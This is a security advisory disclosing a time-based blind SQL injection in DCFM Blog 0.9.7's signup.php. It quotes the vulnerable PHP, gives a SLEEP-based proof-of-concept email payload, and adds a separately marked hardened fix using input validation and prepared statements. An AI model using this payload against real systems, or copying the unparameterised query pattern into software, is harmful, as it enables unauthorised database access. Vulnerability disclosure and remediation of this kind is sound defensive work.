DCFM Blog 0.9.7 Blind SQL Injection

2016-11-17T00:00:00
ID PACKETSTORM:139774
Type packetstorm
Reporter N_A
Modified 2016-11-17T00:00:00

Description

                                        
                                            `DCFM Blog Version 0.9.7 Blind SQL Injection Vulnerability ( time based-attack )  
================================================================================  
  
  
  
Discovered by N_A , N_A[at]tutanota.com  
========================================  
  
  
  
  
Description  
============  
  
Open-source blog project. Free blog system for any website. Uses MySQL and PHP 5. Very easily customizable and incredibly flexible.  
  
https://sourceforge.net/projects/dcfm-blog/  
  
  
  
  
Vulnerability  
==============  
  
A blind SQL Injection is possible within the signup.php file of DCFM Blog version 0.9.7.  
  
  
  
$desuser = $_POST['desuser'];  
$despass = $_POST['despass'];  
$email = $_POST['email'];  // <-- the vulnerable variable  
$firstname = $_POST['firstname'];  
$lastname = $_POST['lastname'];  
$submitted = $_POST['submitted'];  
$despassconfirm = $_POST['despassconfirm'];  
  
  
  
The $email variable is not properly checked: the regex only requires an '@' followed somewhere by a '.', so any additional characters (including quotes and SQL syntax) are accepted as long as the string still matches that loose email shape:  
  
if(!ereg("^.+@.+\\..+$",$email)) {  
    $evil = 1;  
    $error="<p>  
    The highlighted fields are not filled out correctly.  
    </p>";  
}  
  
  
  
The '.+' parts of the regular expression match "one or more of any character", so a single quote and SQL keywords pass the check. It is therefore possible to attach a crafted SQL injection string to the end of the $email value.  
  
The crafted string is interpolated directly into the MySQL query, with no escaping or parameterization:  
  
$result = mysql_query("SELECT * FROM accounts  
WHERE Email='$_POST[email]'");  // raw POST value inside the query string  
while($row = mysql_fetch_array($result)) {  
    if ($email == $row['Email'])  
        // (remainder of the loop body is not quoted in the advisory)  
}  
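As an added example (not code from DCFM Blog or from the advisory author), the two weak spots above are shown beside a hardened form a maintainer could drop into signup.php: a real email validator instead of the `.+@.+\..+` pattern, and a prepared statement instead of string interpolation. It assumes a PDO connection in `$pdo` and the `accounts` table / `Email` column named in the advisory; the function names `legacyEmailCheck`, `isValidEmail` and `emailAlreadyRegistered` are chosen here and do not exist in the project. The advisory's own payload is reused only as a test input for the validator.

```php
<?php
// Added example, not DCFM Blog code. Assumes a PDO connection $pdo created
// elsewhere and a MySQL table `accounts` with an `Email` column (per the advisory).

// The payload string from the advisory, used here purely as validator input.
$payloadFromAdvisory = "jimmy@site.com' AND (SELECT * FROM (SELECT(SLEEP(5)))MXKf) AND 'dBWQ'='dBWQ";

// 1. The original check, written with preg_match because ereg() was removed in PHP 7.
//    '.+' accepts any character, so quotes, spaces and SQL keywords all pass as
//    long as an '@' and a later '.' appear somewhere in the string.
function legacyEmailCheck(string $email): bool
{
    return preg_match('/^.+@.+\..+$/', $email) === 1;
}

// 2. Hardened check: PHP's built-in validator only allows RFC-shaped addresses
//    (the domain part is restricted to letters, digits, hyphens and dots), so
//    the quote, spaces and parentheses in the payload are rejected. The length
//    cap bounds what is ever handed to the database.
function isValidEmail(string $email): bool
{
    if (strlen($email) > 254) {
        return false;
    }
    return filter_var($email, FILTER_VALIDATE_EMAIL) !== false;
}

var_dump(legacyEmailCheck($payloadFromAdvisory)); // bool(true)  - the injection string passes the old check
var_dump(isValidEmail($payloadFromAdvisory));     // bool(false) - rejected before any SQL is built
var_dump(isValidEmail('jimmy@site.com'));         // bool(true)

// 3. Validation alone is not the fix. The original code ran
//    "SELECT * FROM accounts WHERE Email='$_POST[email]'" and looped over every
//    row. A prepared statement sends the value separately from the query text,
//    so a quote in $email can never terminate the string literal, and the
//    database does the comparison instead of PHP iterating the whole table.
function emailAlreadyRegistered(PDO $pdo, string $email): bool
{
    $stmt = $pdo->prepare('SELECT 1 FROM accounts WHERE Email = ? LIMIT 1');
    $stmt->execute([$email]);
    return $stmt->fetchColumn() !== false;
}

// Signup flow using both pieces.
$email = $_POST['email'] ?? '';
if (!isValidEmail($email)) {
    $error = '<p>The highlighted fields are not filled out correctly.</p>';
} elseif (emailAlreadyRegistered($pdo, $email)) {
    $error = '<p>That email address is already registered.</p>';
}
```

The order matters: the prepared statement is what removes the injection, and the validator is defence in depth that also keeps junk out of the `accounts` table. Had the project only tightened the regex, any later query that still interpolated `$_POST` values would remain exploitable.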
  
  
  
  
  
  
Proof Of Concept Exploit String  
================================  
  
  
  
Fill out the whole form and input the email variable as follows:  
  
jimmy@site.com' AND (SELECT * FROM (SELECT(SLEEP(5)))MXKf) AND 'dBWQ'='dBWQ  
  
  
  
  
  
Email  
=====  
  
N_A[at]tutanota.com  